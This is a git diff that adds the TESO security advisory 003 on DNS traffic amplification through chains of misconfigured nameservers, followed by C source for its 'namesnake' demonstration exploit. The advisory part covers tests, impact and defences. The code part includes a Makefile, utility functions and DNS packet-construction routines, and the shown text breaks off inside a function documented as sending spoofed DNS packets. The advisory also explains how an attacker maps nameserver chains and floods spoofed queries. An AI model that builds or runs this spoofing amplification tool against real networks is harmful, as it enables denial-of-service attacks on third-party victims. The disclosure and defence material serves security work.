+    but we have observed misconfigured servers which tried more then 20 times
+    sending out a query packet.
+
+    Note that this attack is completely different from the DNS Smurf attack
+    discovered by s0ftpr0ject [4], however, it exploits weaknesses in default
+    BIND [6] configurations too.
+
+
+Tests
+===================
+
+    The following data is an except from initial tests we have conducted
+    against some vulnerable nameserver.
+
+    08:07:24.943598 ns2.domain > victim.domain: 15121 (35)
+    08:07:32.747253 ns3.domain > victim.domain: 8536 (35)
+    08:07:32.832604 ns2.domain > victim.domain: 15121 (35)
+    08:07:39.819289 ns3.domain > victim.domain: 8536 (35)
+    08:07:40.670228 ns1.1025 > victim.domain: 56483 (35)
+    08:07:44.405556 ns4.domain > victim.domain: 5306 (35) (DF)
+    08:07:48.928981 ns2.domain > victim.domain: 15121 (35)
+    08:07:52.669825 ns1.1025 > victim.domain: 56483 (35)
+    08:07:56.107063 ns3.domain > victim.domain: 8536 (35)
+    08:07:56.471586 ns4.domain > victim.domain: 5306 (35) (DF)
+    08:08:04.938187 ns6.domain > victim.domain: 26706 (35)
+    08:08:12.372097 ns5.2187 > victim.domain: 2352 (35)
+    08:08:13.826464 ns6.domain > victim.domain: 26706 (35)
+    08:08:16.669021 ns1.1025 > victim.domain: 56483 (35)
+    08:08:20.603050 ns4.domain > victim.domain: 5306 (35) (DF)
+    08:08:24.365990 ns5.2187 > victim.domain: 2352 (35)
+    08:08:30.873233 ns6.domain > victim.domain: 26706 (35)
+      08:08:32.658479 ns1.domain > querier.1025: 298 ServFail 0/0/0 (35)
+    08:08:48.369725 ns5.2187 > victim.domain: 2352 (35)
+
+    The initial DNS query packet had a size of 35 bytes, although packets
+    up to a size of 500 bytes are possible.
+    As you can see there are five nameservers who indirectly got the query,
+    which was send by "querier" (query packet not displayed). The first name-
+    server that got queried was "ns1".
+
+    The query is forwarded to five other nameservers, so all together there are
+    six nameservers which try to resolve the query domain. If the query domain
+    is a normal existent domain name, the authoritative nameserver will answer
+    promptly and the answer is returned to the original query host.
+
+    This is the normal case. However, if there is an authoritative nameserver
+    which does not respond to the queries send to it, all nameservers will
+    retry to resolve the domain by sending out the query packet, assuming the
+    UDP packet they have previously sent got lost.
+    Because all six nameservers do this, this results in a traffic amplify
+    with factor 18 (18 packets send for each attacker packet).
+
+    Through testing a few hundred nameservers on this vulnerability we quickly
+    found nameservers which will amplify with ratios well beyond 30, sometimes
+    even exceeding 50.
+
+
+Impact
+===================
+
+    By abusing multiple nameserver-chains as traffic amplifiers an attacker can
+    easily saturate any network link. The traffic to the victim IP is caused by
+    the query packets which are sent by each nameserver in the nameserver-chain
+    to the fake authoritative nameserver in the victim network.
+
+    For the last few years denial of service (DoS) attacks that are based on
+    bandwidth saturation have always been a problem. A few years ago, when the
+    Smurf ICMP denial of service attack got publicly known nearly everyone was
+    able to saturate any link by abusing other networks as a traffic amplifier.
+    Since then numerous amplify attacks have been discovered, such as [3] and
+    [4], the original posting of the Smurf attack is [5].
+
+    Any method that allows an attacker to amplify his traffic can be abused for
+    a denial of service attack.
+
+
+Explanation
+===================
+
+    When a nameserver receives a query, most nameservers usually just start
+    forwarding the query to some other nameserver. There can be quite a long
+    path of forwarding queries. However if the query is not resolvable
+    because there is no nameserver listening on the remote host, every
+    forwarding nameserver will start to resolve it on their own, by querying
+    the authoritative nameserver themselves. In the default configuration each
+    nameserver will send the query three times, after 0, 12 and 24 seconds,
+    ymmv.
+
+    This can be used to discover the path of nameservers. To do this an
+    attacker would query the first nameserver for a domain he can see the
+    packets on, at best the domain points to the query host itself. Then he
+    would record all nameservers that send out a packet to himself. After
+    having done this he would try with another nameserver of the ones he got
+    queries from. In the best case he will receive queries from all hosts
+    but one missing. The missing one is the first host in the route. After
+    having reduced the list by one he will start over with the reduced list
+    until there is only one nameserver remaining, which is the last in the
+    querying chain.
+
+    Through seeking especially long paths, where a lot of nameservers are
+    queried, this can be abused as a traffic amplify bandwidth attack, as shown
+    above.
+
+    Since the important entries such as the NS entry is in the cache of each
+    nameserver after the first query, the attack is very fast pacing after the
+    first query, since no additional packets are sent to the attacker and the
+    attacker may spoof the UDP query packets. If the attacker is clever he
+    would use a very short lifetime for his NS entry, while using a long
+    lifetime for the victim subdomain. After the first query succeeded he will
+    just shut his nameserver down and send out spoofed query packets at a very
+    fast rate.
+
+
+Solution
+===================
+
+    "Defense is the best Offense" - said by a wise person. By protecting your
+    own nameservers against being abused by attackers you secure other sites at
+    the same time. If you run BIND [6] nameservers in your network please care
+    to read basic BIND configuration tutorials and especially documents on how
+    to secure your BIND configuration [7].
+
+    Also notice that you may fall victim to the same attack, if only one
+    nameserver in your network is vulnerable -- That means if only one
+    server is accepting queries for external domains from strangers, this
+    nameserver inside your network will send out trusted queries to other
+    nameservers in your network, and hence can be abused too.
+
+    By taking more generic measures against being the originator network of
+    denial of service attacks, such as improving your overall network security,
+    you contribute to the security of all other networks in the Internet too.
+    I urge you to subscribe to a security related mailing list, such as
+    Bugtraq [8] or, if you cannot afford the time necessary to read such a
+    list, at least subscribe to the CERT list [9].
+
+    In general there is no foolproof method to avoid getting a victim of a DNS
+    Smurf. But what can you do if you get attacked ?
+
+    To think of the correct response we have to think of why this attack works.
+    It works because other nameservers try to query a non-existent nameserver
+    in your network and don't get any response, hence retrying again. To just
+    filter DNS traffic to this IP is only of little use as a short-time
+    measure. Instead setting up a bogus DNS server on the victim IP address,
+    which replies with bogus answers to any query it receives will reduce the
+    impact of the attack.
+
+    However the real cause for the attack is still the number of misconfigured
+    DNS servers out there, which accept queries for external domains from
+    strangers. Another reason is the unreliable transport protocol which makes
+    it impossible for the nameserver to notice the unreachability of the remote
+    victim nameserver.
+
+
+Acknowledgments
+================
+
+    The bug discovery and the demonstration programs is due to TESO [1].
+
+    This advisory has been written by scut and hendy.
+    The tests and further analysis were done by scut.
+    The demonstration exploit has been written by scut.
+
+
+Contact Information
+===================
+
+    The TESO crew can be reached by mailing to teso@shellcode.org.
+    Our web page is at http://teso.scene.at/
+
+
+References
+===================
+
+    [1] TESO
+        http://teso.scene.at/
+
+    [2] Packetfactory
+        http://www.packetfactory.net/
+
+    [3] The "MAC DoS Attack", a x37 traffic amplify attack
+        posted on Bugtraq Mailing List 12/28/1999, discovered by John Copeland
+
+    [4] DNS Smurf (through query/answer ratio)
+        s0ftpr0ject Security Advisory SPJ-002-000, July 19, 1999
+        posted on Bugtraq Mailing List 07/30/1999, discovered by scacco
+
+    [5] ICMP ECHO Requests to Broadcast addresses (ICMP Smurf attack)
+        posted on Bugtraq Mailing List 07/19/1997, posting by Edward Henigin
+
+    [6] BIND nameserver software - Internet Software Consortium
+        http://www.isc.org/
+
+    [7] Securing Domain Name Service
+        Article on securityportal.com security related website
+        http://securityportal.com/cover/coverstory19990621.html
+
+    [8] Bugtraq Mailing List
+        http://www.securityfocus.com/about/feedback/subscribe-bugtraq.html
+
+    [9] CERT Mailing List
+        http://www.cert.org/contact_cert/certmaillist.html
+
+
+
+Disclaimer
+===================
+
+    This advisory does not claim to be complete or to be usable for any
+    purpose. Especially information on the vulnerable systems may be
+    inaccurate or wrong. The supplied exploit is not to be used for malicious
+    purposes, but for educational purposes only.
+
+    This advisory is free for open distribution in unmodified form.
+    Articles that are based on information from this advisory should include
+    link [1].
+
+
+Exploit
+===================
+
+    We've created a working demonstration program to exploit the vulnerability.
+    The program needs Libnet, a low level network library installed, which can
+    be obtained through [2].
+
+    The exploit is available from
+
+       http://teso.scene.at/
+
+------
+
+
diff --git a/advisories/teso-advisory-003/namesnake/src/Makefile b/advisories/teso-advisory-003/namesnake/src/Makefile
new file mode 100644
index 0000000..5981e52
--- /dev/null
+++ b/advisories/teso-advisory-003/namesnake/src/Makefile
@@ -0,0 +1,16 @@
+CFLAGS=-Wall -ggdb `libnet-config --defines`
+LIBS=-lnet
+CC=gcc
+OBJS=common.o dns-build.o dns.o io-udp.o network.o
+
+all:            namesnake rattlesnake
+
+clean:
+                rm -f *.o namesnake rattlesnake
+
+rattlesnake:    rattlesnake.c $(OBJS)
+                $(CC) $(CFLAGS) -static -o rattlesnake rattlesnake.c $(OBJS) $(LIBS)
+
+namesnake:      namesnake.c $(OBJS)
+                $(CC) $(CFLAGS) -o namesnake namesnake.c $(OBJS) $(LIBS)
+
diff --git a/advisories/teso-advisory-003/namesnake/src/common.c b/advisories/teso-advisory-003/namesnake/src/common.c
new file mode 100644
index 0000000..36391ad
--- /dev/null
+++ b/advisories/teso-advisory-003/namesnake/src/common.c
@@ -0,0 +1,372 @@
+
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <sys/time.h>
+#include <netinet/in.h>
+#include <unistd.h>
+#include <time.h>
+#include <stdarg.h>
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include "common.h"
+
+
+#ifdef  DEBUG
+void
+debugp (char *filename, const char *str, ...)
+{
+        FILE            *fp;    /* temporary file pointer */
+        va_list         vl;
+
+        fp = fopen (filename, "a");
+        if (fp == NULL)
+                return;
+
+        va_start (vl, str);
+        vfprintf (fp, str, vl);
+        va_end (vl);
+
+        fclose (fp);
+
+        return;
+}
+
+void
+hexdump (char *filename, unsigned char *data, unsigned int amount)
+{
+        FILE            *fp;    /* temporary file pointer */
+        unsigned int    dp, p;  /* data pointer */
+        const char      trans[] = "................................ !\"#$%&'()*+,-./0123456789"
+                                        ":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm"
+                                        "nopqrstuvwxyz{|}~...................................."
+                                        "....................................................."
+                                        "........................................";
+
+        fp = fopen (filename, "a");
+        if (fp == NULL)
+                return;
+
+        fprintf (fp, "\n-packet-\n");
+
+        for (dp = 1; dp <= amount; dp++) {
+                fprintf (fp, "%02x ", data[dp-1]);
+                if ((dp % 8) == 0)
+                        fprintf (fp, " ");
+                if ((dp % 16) == 0) {
+                        fprintf (fp, "| ");
+                        p = dp;
+                        for (dp -= 16; dp < p; dp++)
+                                fprintf (fp, "%c", trans[data[dp]]);
+                        fflush (fp);
+                        fprintf (fp, "\n");
+                }
+                fflush (fp);
+        }
+        if ((amount % 16) != 0) {
+                p = dp = 16 - (amount % 16);
+                for (dp = p; dp > 0; dp--) {
+                        fprintf (fp, "   ");
+                        if (((dp % 8) == 0) && (p != 8))
+                                fprintf (fp, " ");
+                        fflush (fp);
+                }
+                fprintf (fp, " | ");
+                for (dp = (amount - (16 - p)); dp < amount; dp++)
+                        fprintf (fp, "%c", trans[data[dp]]);
+                fflush (fp);
+        }
+        fprintf (fp, "\n");
+
+        fclose (fp);
+        return;
+}
+
+#endif
+
+
+char **
+file_read (char *filename)
+{
+        char    buf[2048];
+        FILE    *fp;
+        char    **line_array = NULL;
+        int     ac = 0;
+        char    *c_p;
+
+        fp = fopen (filename, "r");
+        if (fp == NULL)
+                return (NULL);
+
+        memset (buf, '\0', sizeof (buf));
+        while (fgets (buf, sizeof (buf) - 1, fp) != NULL) {
+                line_array = xrealloc (line_array, (++ac + 1) * (sizeof (char *)));
+                line_array[ac] = NULL;  /* eoa ptr ss! */
+                for (c_p = (buf + sizeof (buf) - 1) ; c_p != buf ; c_p--) {
+                        if (*c_p == '\n')
+                                *c_p = '\0';
+                }
+                line_array[ac - 1] = xstrdup (buf);     /* hook em up */
+                memset (buf, '\0', sizeof (buf));
+        }
+        fclose (fp);
+
+        return (line_array);
+}
+
+
+/* z_fork
+ *
+ * fork and detach forked client completely to avoid zombies.
+ * taken from richard stevens excellent system programming book :) thanks,
+ * whereever you are now.
+ *
+ * caveat: the pid of the child has already died, it can just be used to
+ *         differentiate between parent and not parent, the pid of the
+ *         child is inaccessibly.
+ *
+ * return pid of child for old process
+ * return 0 for child
+ */
+
+pid_t
+z_fork (void)
+{
+        pid_t   pid;
+
+        pid = fork ();
+        if (pid < 0) {
+                return (pid);
+        } else if (pid == 0) {
+                /* let the child fork again
+                 */
+
+                pid = fork ();
+                if (pid < 0) {
+                        return (pid);
+                } else if (pid > 0) {
+                        /* let the child and parent of the second child
+                         * exit
+                         */
+                        exit (EXIT_SUCCESS);
+                }
+
+                return (0);
+        }
+
+        waitpid (pid, NULL, 0);
+
+        return (pid);
+}
+
+
+/* m_random
+ *
+ * return a random number between `lowmark' and `highmark'
+ */
+
+int
+m_random (int lowmark, int highmark)
+{
+        long int        rnd;
+
+        /* flip/swap them in case user messed up
+         */
+        if (lowmark > highmark) {
+                lowmark ^= highmark;
+                highmark ^= lowmark;
+                lowmark ^= highmark;
+        }
+        rnd = lowmark;
+
+        rnd += (random () % (highmark - lowmark));
+
+        /* this is lame, i know :)
+         */
+        return (rnd);
+}
+
+
+/* set_tv
+ *
+ * initializes a struct timeval pointed to by `tv' to a second value of
+ * `seconds'
+ *
+ * return in any case
+ */
+
+void
+set_tv (struct timeval *tv, int seconds)
+{
+        tv->tv_sec = seconds;
+        tv->tv_usec = 0;
+
+        return;
+}
+
+
+/* xstrupper
+ *
+ * uppercase a string `str'
+ *
+ * return in any case
+ */
+
+void
+xstrupper (char *str)
+{
+        for (; *str != '\0'; ++str) {
+                if (*str >= 'a' && *str <= 'z') {
+                        *str -= ('a' - 'A');
+                }
+        }
+
+        return;
+}
+
+
+/* concating snprintf
+ *
+ * determines the length of the string pointed to by `os', appending formatted
+ * string to a maximium length of `len'.
+ *
+ */
+
+void
+scnprintf (char *os, size_t len, const char *str, ...)
+{
+        va_list vl;
+        char    *ostmp = os + strlen (os);
+
+        va_start (vl, str);
+        vsnprintf (ostmp, len - strlen (os) - 1, str, vl);
+        va_end (vl);
+
+        return;
+}
+
+unsigned long int
+tdiff (struct timeval *old, struct timeval *new)
+{
+        unsigned long int       time1;
+
+        if (new->tv_sec >= old->tv_sec) {
+                time1 = new->tv_sec - old->tv_sec;
+                if ((new->tv_usec - 500000) >= old->tv_usec)
+                        time1++;
+        } else {
+                time1 = old->tv_sec - new->tv_sec;
+                if ((old->tv_usec - 500000) >= new->tv_usec)
+                        time1++;
+        }
+
+        return (time1);
+}
+
+
+/* ipv4_print
+ *
+ * padding = 0 -> don't padd
+ * padding = 1 -> padd with zeros
+ * padding = 2 -> padd with spaces
+ */
+
+char *
+ipv4_print (char *dest, struct in_addr in, int padding)
+{
+        unsigned char   *ipp;
+
+        ipp = (unsigned char *) &in.s_addr;
+
+        strcpy (dest, "");
+
+        switch (padding) {
+        case (0):
+                sprintf (dest, "%d.%d.%d.%d", ipp[0], ipp[1], ipp[2], ipp[3]);
+                break;
+        case (1):
+                sprintf (dest, "%03d.%03d.%03d.%03d", ipp[0], ipp[1], ipp[2], ipp[3]);
+                break;
+        case (2):
+                sprintf (dest, "%3d.%3d.%3d.%3d", ipp[0], ipp[1], ipp[2], ipp[3]);
+                break;
+        default:
+                break;
+        }
+
+        return (dest);
+}
+
+
+void *
+xrealloc (void *m_ptr, size_t newsize)
+{
+        void    *n_ptr;
+
+        n_ptr = realloc (m_ptr, newsize);
+        if (n_ptr == NULL) {
+                fprintf (stderr, "realloc failed\n");
+                exit (EXIT_FAILURE);
+        }
+
+        return (n_ptr);
+}
+
+
+char *
+xstrdup (char *str)
+{
+        char    *b;
+
+        b = strdup (str);
+        if (b == NULL) {
+                fprintf (stderr, "strdup failed\n");
+                exit (EXIT_FAILURE);
+        }
+
+        return (b);
+}
+
+
+void *
+xcalloc (int factor, size_t size)
+{
+        void    *bla;
+
+        bla = calloc (factor, size);
+
+        if (bla == NULL) {
+                fprintf (stderr, "no memory left\n");
+                exit (EXIT_FAILURE);
+        }
+
+        return (bla);
+}
+
+/* source by dk
+ */
+
+char *
+allocncat (char **to, char *from, size_t len)
+{
+        int rlen = strlen (from);
+        int null = *to == NULL;
+
+        len = rlen < len ? rlen : len;
+        *to = realloc (*to, (null ? 0 : strlen (*to)) + len + 1);
+        if (null)
+                **to = '\0';
+
+        if (*to == NULL)
+                perror ("no memory: ");
+
+        return (strncat (*to, from, len));
+}
+
+char *
+alloccat (char **to, char *from)
+{
+   return (allocncat (to, from, strlen (from)));
+}
+
diff --git a/advisories/teso-advisory-003/namesnake/src/common.h b/advisories/teso-advisory-003/namesnake/src/common.h
new file mode 100644
index 0000000..0f41ca4
--- /dev/null
+++ b/advisories/teso-advisory-003/namesnake/src/common.h
@@ -0,0 +1,31 @@
+
+#ifndef Z_COMMON_H
+#define Z_COMMON_H
+
+
+#include <sys/types.h>
+#include <sys/time.h>
+#include <netinet/in.h>
+#include <unistd.h>
+
+
+#ifdef  DEBUG
+void    debugp (char *filename, const char *str, ...);
+void    hexdump (char *filename, unsigned char *data, unsigned int amount);
+#endif
+char **                 file_read (char *filename);
+pid_t                   z_fork (void);
+int                     m_random (int lowmark, int highmark);
+void                    set_tv (struct timeval *tv, int seconds);
+void                    xstrupper (char *str);
+void                    scnprintf (char *os, size_t len, const char *str, ...);
+unsigned long int       tdiff (struct timeval *old, struct timeval *new);
+char                    *ipv4_print (char *dest, struct in_addr in, int padding);
+void                    *xrealloc (void *m_ptr, size_t newsize);
+char                    *xstrdup (char *str);
+void                    *xcalloc (int factor, size_t size);
+char                    *allocncat (char **to, char *from, size_t len);
+char                    *alloccat (char **to, char *from);
+
+#endif
+
diff --git a/advisories/teso-advisory-003/namesnake/src/dns-build.c b/advisories/teso-advisory-003/namesnake/src/dns-build.c
new file mode 100644
index 0000000..933db43
--- /dev/null
+++ b/advisories/teso-advisory-003/namesnake/src/dns-build.c
@@ -0,0 +1,608 @@
+/* namesnake
+ *
+ * dns packet construction routines
+ * if you need some, just borrow here and drop me a line of credit :)
+ *
+ * by scut / teso
+ */
+
+#include <libnet.h>     /* route's owning library =) */
+#include <arpa/nameser.h>
+#include <netinet/in.h>
+#include <stdlib.h>
+#include <string.h>
+#include "common.h"
+#include "dns.h"
+#include "dns-build.h"
+#include "io-udp.h"
+#include "network.h"
+
+
+/* dns_build_random
+ *
+ * prequel the domain name `domain' with a random sequence of characters
+ * with a random length if len is zero, or a fixed length if len is != 0
+ *
+ * return the allocated new string
+ */
+
+char *
+dns_build_random (char *domain, size_t len)
+{
+        int     dlen, cc;
+        char    *pr;
+
+        cc = dlen = (len == 0) ? m_random (3, 16) : len;
+        pr = xcalloc (1, strlen (domain) + dlen + 2);
+        for (; dlen > 0; --dlen) {
+                char    p;
+
+                (int) p = m_random ((int) 'a', (int) 'z');
+                pr[dlen - 1] = p;
+        }
+        pr[cc] = '.';
+        memcpy (pr + cc + 1, domain, strlen (domain));
+
+        return (pr);
+}
+
+
+/* dns_domain
+ *
+ * return a pointer to the beginning of the SLD within a full qualified
+ * domain name `domainname'.
+ *
+ * return NULL on failure
+ * return a pointer to the beginning of the SLD on success
+ */
+
+char *
+dns_domain (char *domainname)
+{
+        char    *last_label = NULL,
+                *hold_label = NULL;
+
+        if (domainname == NULL)
+                return (NULL);
+
+        /* find last SLD
+         */
+        for (; *domainname != '\x00'; ++domainname) {
+                if (*domainname == '.') {
+                        last_label = hold_label;
+                        hold_label = domainname + 1;
+                }
+        }
+
+        return (last_label);
+}
+
+
+/*
+ * gets the domain of an in-addr.arpa string.
+ * 123.123.123.123.in-addr.arpa ==> 123.123.123.in-addr.arpa
+ * return a pointer inside arpaname on success
+ * return NULL on failure
+ */
+
+char *
+dns_ptr_domain (char *arpaname)
+{
+        char    *dot;
+
+        if (strstr (arpaname, "in-addr.arpa") == NULL)
+                return (NULL);
+
+        if (atoi (arpaname) == 0)
+                return (NULL);
+
+        dot = strchr (arpaname, '.');
+
+        return ((dot == NULL) ? NULL : (dot + 1));
+}
+
+
+/* dns_build_new
+ *
+ * constructor. create new packet data body
+ *
+ * return packet data structure pointer (initialized)
+ */
+
+dns_pdata *
+dns_build_new (void)
+{
+        dns_pdata       *new;
+
+        new = xcalloc (1, sizeof (dns_pdata));
+        new->p_offset = NULL;
+        new->p_data = NULL;
+
+        return (new);
+}
+
+
+/* dns_build_destroy
+ *
+ * destructor. destroy a dns_pdata structure pointed to by `pd'
+ *
+ * return in any case
+ */
+
+void
+dns_build_destroy (dns_pdata *pd)
+{
+        if (pd == NULL)
+                return;
+
+        if (pd->p_data != NULL)
+                free (pd->p_data);
+        free (pd);
+
+        return;
+}
+
+
+/* dns_build_plen
+ *
+ * calculate the length of the current packet data body pointed to by `pd'.
+ *
+ * return the packet length
+ */
+
+u_short
+dns_build_plen (dns_pdata *pd)
+{
+        if (pd == NULL)
+                return (0);
+
+        if (pd->p_data == NULL || pd->p_offset == NULL)
+                return (0);
+
+        return ((u_short) (pd->p_offset - pd->p_data));
+}
+
+
+/* dns_build_extend
+ *
+ * extend a dns_pdata structure data part for `amount' bytes.
+ *
+ * return a pointer to the beginning of the extension
+ */
+
+unsigned char *
+dns_build_extend (dns_pdata *pd, size_t amount)
+{
+        unsigned int    u_ptr = dns_build_plen (pd);
+
+        /* realloc is your friend =)
+         */
+        pd->p_data = realloc (pd->p_data, u_ptr + amount);
+        if (pd->p_data == NULL) {
+                exit (EXIT_FAILURE);
+        }
+
+        /* since realloc can move the memory we have to calculate
+         * p_offset completely from scratch
+         */
+        pd->p_offset = pd->p_data + u_ptr + amount;
+
+        return (pd->p_data + u_ptr);
+}
+
+
+/* dns_build_ptr
+ *
+ * take a numeric quad dot notated ip address `ip_str' and build a char
+ * domain out of it within the IN-ADDR.ARPA domain.
+ *
+ * return NULL on failure
+ * return a char pointer to the converted domain name
+ */
+
+char *
+dns_build_ptr (char *ip_str)
+{
+        char    *ip_ptr;
+        int     dec[4];
+        int     n;
+
+        if (ip_str == NULL)
+                return (NULL);
+
+        /* kludge for functions that already pass a reversed string
+         */
+        if (strstr (ip_str, "in-addr.arpa"))
+                return (xstrdup (ip_str));
+
+        /* parse ip string, on failure drop conversion
+         */
+        n = sscanf (ip_str, "%d.%d.%d.%d", &dec[0], &dec[1], &dec[2], &dec[3]);
+        if (n != 4)
+                return (NULL);
+
+        /* allocate a new string of the required length
+         */
+        ip_ptr = xcalloc (1, strlen (ip_str) + strlen (".in-addr.arpa") + 1);
+        sprintf (ip_ptr, "%d.%d.%d.%d.in-addr.arpa", dec[3], dec[2], dec[1], dec[0]);
+
+        return (ip_ptr);
+}
+
+
+/* dns_build_q
+ *
+ * append a query record into a dns_pdata structure, where `dname' is the
+ * domain name that should be queried, using `qtype' and `qclass' as types.
+ *
+ * conversion of the `dname' takes place according to the value of `qtype':
+ *
+ * qtype    | expected dname format | converted to
+ * ---------+-----------------------+-----------------------------------------
+ * T_PTR   | char *, ip address    | IN-ADDR.ARPA dns domain name
+ * T_A     | char *, full hostname | dns domain name
+ * T_NS    | "                     | "
+ * T_CNAME | "                     | "
+ * T_SOA   | "                     | "
+ * T_WKS   | "                     | "
+ * T_HINFO | "                     | "
+ * T_MINFO | "                     | "
+ * T_MX    | "                     | "
+ * T_ANY   | "                     | "
+ *
+ * return (beside adding the record) the pointer to the record within the data
+ */
+
+unsigned char *
+dns_build_q (dns_pdata *pd, char *dname, u_short qtype, u_short qclass)
+{
+        unsigned char   *qdomain = NULL;
+        unsigned char   *tgt, *rp;
+        int             dlen;
+
+        switch (qtype) {
+        case (T_PTR):
+                /* convert in itself, then convert to a dns domain
+                 */
+                dname = dns_build_ptr (dname);
+                if (dname == NULL)
+                        return (NULL);
+
+        case (T_A):
+        case (T_NS):
+        case (T_CNAME):
+        case (T_SOA):
+        case (T_WKS):
+        case (T_HINFO):
+        case (T_MINFO):
+        case (T_MX):
+        case (T_TXT):
+        case (T_ANY):
+                /* convert to a dns domain
+                 */
+                dlen = dns_build_domain (&qdomain, dname);
+                if (dlen == 0)
+                        return (NULL);
+                break;
+        default:
+                return (NULL);
+        }
+
+        tgt = rp = dns_build_extend (pd, dlen + sizeof (qtype) + sizeof (qclass));
+
+        memcpy (tgt, qdomain, dlen);
+        tgt += dlen;
+        free (qdomain);
+
+        PUTSHORT (qtype, tgt);
+        PUTSHORT (qclass, tgt);
+
+        return (rp);
+}
+
+
+/* dns_build_rr
+ *
+ * append a resource record into a dns_pdata structure, pointed ty by `pd',
+ * where `dname' is the domain name the record belongs to, `type' and `class'
+ * are the type and class of the dns data part, `ttl' is the time to live,
+ * the time in seconds how long to cache the record. `rdlength' is the length
+ * of the resource data pointed to by `rdata'.
+ * depending on `type' the data at `rdata' will be converted to the appropiate
+ * type:
+ *
+ * type   | rdata points to     | will be
+ * -------+---------------------+---------------------------------------------
+ * T_A   | char IP address     | 4 byte network byte ordered IP address
+ * T_PTR | char domain name    | encoded dns domain name
+ * T_NS  | char domain name    | encoded dns domain name
+ *
+ * return (beside adding the record) the pointer to the record within the data
+ */
+
+unsigned char *
+dns_build_rr (dns_pdata *pd, unsigned char *dname, u_short type, u_short class,
+        u_long ttl, void *rdata)
+{
+        char            *ptr_ptr = NULL;
+        struct in_addr  ip_addr;                /* temporary, to convert */
+        unsigned char   *qdomain = NULL;
+        unsigned char   *tgt, *rp = NULL;
+        u_short         rdlength = 0;
+        unsigned char   *rdata_converted;       /* converted rdata */
+        int             n;
+
+        switch (type) {
+        case (T_A):
+
+                /* resolve the quad dotted IP address, then copy it into the
+                 * rdata array
+                 */
+
+                ip_addr.s_addr = net_resolve ((char *) rdata);
+                rdata_converted = xcalloc (1, sizeof (struct in_addr));
+                memcpy (rdata_converted, &ip_addr.s_addr, sizeof (struct in_addr));
+                rdlength = 4;
+
+                break;
+
+        case (T_NS):
+        case (T_CNAME):
+        case (T_PTR):
+
+                /* build a dns domain from the plaintext domain name
+                 */
+                n = dns_build_domain ((unsigned char **) &rdata_converted, (char *) rdata);
+                if (n == 0)
+                        return (NULL);
+                rdlength = n;
+
+                break;
+
+        case (T_TXT):
+
+                rdata_converted = xstrdup (rdata);
+                rdlength = strlen (rdata_converted);
+
+                break;
+
+        default:
+                return (NULL);
+        }
+
+        /* create a real dns domain from the plaintext query domain
+         */
+        switch (type) {
+        case (T_PTR):
+                ptr_ptr = dns_build_ptr (dname);
+                dname = ptr_ptr;
+        default:
+                n = dns_build_domain (&qdomain, dname);
+                if (n == 0)
+                        goto rr_fail;
+                break;
+        }
+        if (ptr_ptr != NULL)
+                free (ptr_ptr);
+
+        /* extend the existing dns packet to hold our extra rr record
+         */
+        tgt = rp = dns_build_extend (pd, dns_labellen (qdomain) + sizeof (type) +
+                sizeof (class) + sizeof (ttl) + sizeof (rdlength) + rdlength);
+
+        memcpy (tgt, qdomain, dns_labellen (qdomain));
+        tgt += dns_labellen (qdomain);
+        free (qdomain);
+
+        PUTSHORT (type, tgt);
+        PUTSHORT (class, tgt);
+        PUTLONG (ttl, tgt);
+        PUTSHORT (rdlength, tgt);
+
+        memcpy (tgt, rdata_converted, rdlength);
+        tgt += rdlength;
+
+rr_fail:
+        free (rdata_converted);
+
+        return (rp);
+}
+
+
+/* dns_build_query_label
+ *
+ * build a query label given from the data `query' that should be enclosed
+ * and the query type `qtype' and query class `qclass'.
+ * the label is passed back in printable form, not in label-length form.
+ *
+ * qtype        qclass          query
+ * -----------+---------------+-----------------------------------------------
+ * A            IN              pointer to a host- or domainname
+ * PTR          IN              pointer to a struct in_addr
+ *
+ * ... (to be extended) ...
+ *
+ * return 0 on success
+ * return 1 on failure
+ */
+
+int
+dns_build_query_label (unsigned char **query_dst, u_short qtype, u_short qclass, void *query)
+{
+        char            label[256];
+        struct in_addr  *ip;
+
+        /* we do only internet queries (qclass is just for completeness)
+         * also drop empty queries
+         */
+        if (qclass != C_IN || query == NULL)
+                return (1);
+
+        switch (qtype) {
+        case (T_A):     *query_dst = xstrdup (query);
+                        break;
+
+        case (T_PTR):   memset (label, '\0', sizeof (label));
+                        ip = (struct in_addr *) query;
+                        net_printipr (ip, label, sizeof (label) - 1);
+                        scnprintf (label, sizeof (label), ".in-addr.arpa");
+                        *query_dst = xstrdup (label);
+                        break;
+        default:        return (1);
+                        break;
+        }
+
+        return (0);
+}
+
+
+/* dns_build_domain
+ *
+ * build a dns domain label sequence out of a printable domain name
+ * store the resulting domain in `denc', get the printable domain
+ * from `domain'.
+ *
+ * return 0 on failure
+ * return length of the created domain (include suffixing '\x00')
+ */
+
+int
+dns_build_domain (unsigned char **denc, char *domain)
+{
+        char    *start = domain,
+                *out,
+                c = '\0';
+        int     n = strlen (domain);
+
+        if (n > MAXDNAME)
+                return (0);
+
+        out = *denc = xcalloc (1, n + 2);
+
+        domain += n - 1;
+        out += n + 1;
+        *out-- = 0;
+
+        n = 0;
+
+        while (domain >= start) {
+                c = *domain--;
+                if (c == '.') {
+                        *out-- = n;
+                        n = 0;
+                } else {
+                        *out-- = c;
+                        n++;
+                }
+        }
+
+        if (n != '\0')
+                *out-- = n;
+
+        return (strlen (out + 1) + 1);
+}
+
+
+/* dns_build_domain_dotlen
+ *
+ * helper routine, determine the length of the next label in a human
+ * printed domain name
+ *
+ * return the number of characters until an occurance of \x00 or '.'
+ */
+
+int
+dns_build_domain_dotlen (char *label)
+{
+        int     n;
+
+        /* determine length
+         */
+        for (n = 0; *label != '.' && *label != '\x00'; n++, ++label)
+                ;
+
+        return (n);
+}
+
+
+/* dns_packet_send
+ *
+ * send a prepared dns packet spoofing from `ip_src' to `ip_dst', using
+ * source port `prt_src' and destination port `prt_dst'. the dns header
+ * data is filled with `dns_id', the dns identification number of the
+ * packet, `flags', which are the 16bit flags in the dns header, then
+ * four count variables, each for a dns segment: `count_q' is the number
+ * of queries, `count_a' the number of answers, `count_ns' the number of
+ * nameserver entries and `count_ad' the number of additional entries.
+ * the real dns data is aquired from `dbuf', `dbuf_s' bytes in length.
+ * the dns data should be constructed using the dns_build_* functions.
+ * if the packet should be compressed before sending it, `compress'
+ * should be set to 1.
+ *
+ * return 0 on success
+ * return 1 on failure
+ */
+
+int
+dns_packet_send (char *ip_src, char *ip_dst, u_short prt_src, u_short prt_dst,
+        u_short dns_id, u_short flags, u_short count_q, u_short count_a,
